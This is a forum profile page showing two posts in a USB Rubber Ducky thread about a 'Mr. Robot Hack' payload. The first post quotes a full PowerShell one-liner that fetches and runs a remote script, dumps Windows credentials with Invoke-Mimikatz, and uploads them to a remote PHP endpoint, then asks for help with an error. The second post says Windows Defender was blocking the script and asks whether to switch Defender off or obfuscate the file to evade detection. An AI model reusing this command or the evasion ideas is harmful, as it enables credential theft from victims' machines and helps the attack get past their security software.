MS08067
-
Posts
2 -
Joined
-
Last visited
Posts posted by MS08067
-
-
I am getting the following error. The web server does create the file, however the contents are blank, here is what is found when running the command.. anyone else run into this?
C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
C:\WINDOWS\system32>
Mr. Robot Hack (optimized payload)
in Classic USB Rubber Ducky
Posted
I figured out whats going on here. Windows Defender was catching it and removing it before It was able to be ran. Once I disabled it, it then worked just fine. Now the question is, should we automate turning windows defender off as a service (since we are administrator) or do we try and obfuscate the file so its not detected ?